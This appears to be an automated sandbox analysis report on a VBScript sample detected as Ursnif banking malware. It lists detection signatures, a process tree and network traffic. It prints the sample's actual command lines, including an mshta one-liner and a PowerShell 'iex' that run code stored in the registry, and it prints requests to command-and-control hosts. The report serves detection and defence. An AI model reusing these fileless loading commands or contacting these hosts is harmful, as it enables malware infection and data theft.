Loading ...

Play interactive tourEdit tour

Analysis Report 0xyZ4rY0opA2.vbs

Overview

General Information

Sample Name:0xyZ4rY0opA2.vbs
Analysis ID:322273
MD5:91c16c7f676eec811c3ad36e32a9dbb3
SHA1:5395939a249782d0d6651d970f9a3af1df8924f6
SHA256:67998bc22f994c7acb53cf98d8cf4d039a31b425f2b2f0c6d949426df05542c9

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6296 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0xyZ4rY0opA2.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6976 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2936 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6976 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • nslookup.exe (PID: 5928 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
  • iexplore.exe (PID: 5660 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5768 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 2212 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 3096 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5976 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4560 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD10C.tmp' 'c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 1620 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6896 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE214.tmp' 'c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 2936 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\8F31.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • control.exe (PID: 7048 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 204 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 14 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5976, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', ProcessId: 4560
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3096, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5976
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5976, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', ProcessId: 4560
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 7048, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 204

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdAvira: detection malicious, Label: TR/Crypt.XDR.Gen
            Multi AV Scanner detection for domain / URLShow sources
            Source: c56.lepini.atVirustotal: Detection: 12%Perma Link
            Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
            Source: api10.laptok.atVirustotal: Detection: 12%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdMetadefender: Detection: 29%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdReversingLabs: Detection: 89%
            Multi AV Scanner detection for submitted fileShow sources
            Source: 0xyZ4rY0opA2.vbsVirustotal: Detection: 22%Perma Link
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdJoe Sandbox ML: detected
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA37B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,32_2_04DA37B8
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Uses nslookup.exe to query domainsShow sources
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: Joe Sandbox ViewIP Address: 47.241.19.44 47.241.19.44
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/wRVY2NGdrRF/A_2Fha_2BTMf9b/Bkb0axFyVYg6CTiYCB0u_/2BNYoZUqIeFy6mXY/RsCAvo5yVPYtDbs/KEFb4oNdgILibF2Swr/I2w7rEJuT/Pp84EV24JCnppdQDLtg7/0g_2BJz5R_2FkQu9e_2/FGSaB0rJRCWjGvLRGTnGVc/Iu0pUH4kxZUPO/79c_2Bxp/zIxSbOn31EVZ_2FT_2BE4Ox/zrp24711fz/qBCMvOouQ_2B_2FBw/tevTXGEDmXVA/Fo3RVdsoq0v/QtV4LsUKm4P4d7/Q_0A_0Dq_2BFdmy3Ge3KN/bxiA2odSfTOC3fY6/QHvvQODRC/J_2BkRbDk_2F/bf HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/1uvbKU_2Bbc/ULu41miz1odgDS/0s31zFbFtyChQRUZdq4O6/uZoXvkdGnqZk3S6m/sjGRAy2VVHXHIWC/GbATokLhfRKxJIkWlf/rpIWzL8Zz/AoLyYIkQLp5Egmn3wei2/_2BYsLzf0AqH_2FfXyU/ERE14WKmMp42qnHDG4GKCW/dW1JtsfpRq1bQ/nxcOGVyd/44_2FNnM0ZUEbkxaxhi6GSR/lIHQEHFzka/2x7wIaFlGrWFy74sl/6cFqI7aHF8g5/CnaY7J6ktLq/m_0A_0DTO0929p/475exW0EBf88dYERW4hkW/yci4B7l977luXmG4/ieH0MCQdwnavDmP/zBg2fJ8N/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/tQTtTlNNyyTHp8mZxwj/87ufrUlrtp1usWYjjxq_2B/yAOH12_2F1IYJ/lKW5AYnq/_2BbaPBw_2BvxMvagxVqPyJ/jSUh2wAda1/gHbr670JVUq1KwK7N/6uxLXG5CHSWb/dgl5wFu8VM1/Rkwn44dvXkxcGr/6ai4evYmGZZapTEFZPM6t/l7dnGylpkoukj_2B/UIph5LMwbusYJYR/SgNVcjHjuu6gNQMV1u/yo8w_2BDc/tr29yULxa_2FW8vjKL1w/IkKYcWnRbp20t9pYrs_/0A_0DOoPdbEyCpXUb3P_2B/SP7qNsXNt82Vl/EBYqhcdo/ksN77WU_2Bu9u_2Bp6ImMCY/qmYYk7_2FYRubl/N HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/k2_2BPSkEkmXT6PU/zDOxTRpC_2BY4wv/Uc9rQ_2BdQmALihj0b/O35yk81wO/_2BJJsGmcvqJn3WdvBLw/hcTBL2iarC4qZ4YV_2B/9d_2B7Ggs3BnAW23i_2Bde/t9JKt6KAZoSWe/re2dGR19/9ik0fbgVm0bNqFeU0yDPCsA/NCbWTLbFLW/YFtlZWtXaQQ7AvabV/oGahJymIxSEf/eCn4UPTT9W7/4TOvhUziJPirjd/aVzy6CqNvyNL3A4AuKPyc/d_2F7R5E_2FRLkVN/moL_2BcW_0A_0Dg/DfT_2BdqiAs0Ox1XHx/HnIUtWHt_/2F_2Bw1qPKdBjmoNms0Z/zZq7v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: unknownHTTP traffic detected: POST /api1/ULQHRvwqRb/G8wDpH5qMRHl3_2B4/UEjMLLNvz2cZ/AqaL4_2BQcz/lKb4H9qP6o6VM4/FlSbx_2FrtqOlCmpoRQHO/gmwLzr_2B42eSyBR/YuYftTktOwyZz8p/hMg6srNEseymB6j4aM/TOURtgojN/ejIcLmrrpdo7g5MixpUk/u7YXv1vIle7x1I8w25J/iYIlQpBNQ_2F6_2F52tecp/haAs_2BPE0IZE/BFjaQwUV/3vmY6zByqYDob0bhn9M09Xl/4P5yimux7H/hMxuBTbr_0A_0DFL2/PNs4wicqd7PM/VagjrCBglgI/sb2CcVg_2F8b2O/GuU_2FGPPZ/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Nov 2020 19:34:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000020.00000000.917550792.000000000FD8C000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/1uvbKU_2Bbc/ULu41miz1odgDS/0s31zFbFtyChQRUZdq4O6/uZoXvkdGnqZk3S6m/sjGRAy
            Source: explorer.exe, 00000020.00000000.893860754.0000000001080000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/tQTtTlNNyyTHp8mZxwj/87ufrUlrtp1usWYjjxq_2B/yAOH12_2F1IYJ/lKW5AYnq/_
            Source: explorer.exe, 00000020.00000000.917550792.000000000FD8C000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/tQTtTlNNyyTHp8mZxwj/87ufrUlrtp1usWYjjxq_2B/yAOH12_2F1IYJ/lKW5AYnq/_2BbaP
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
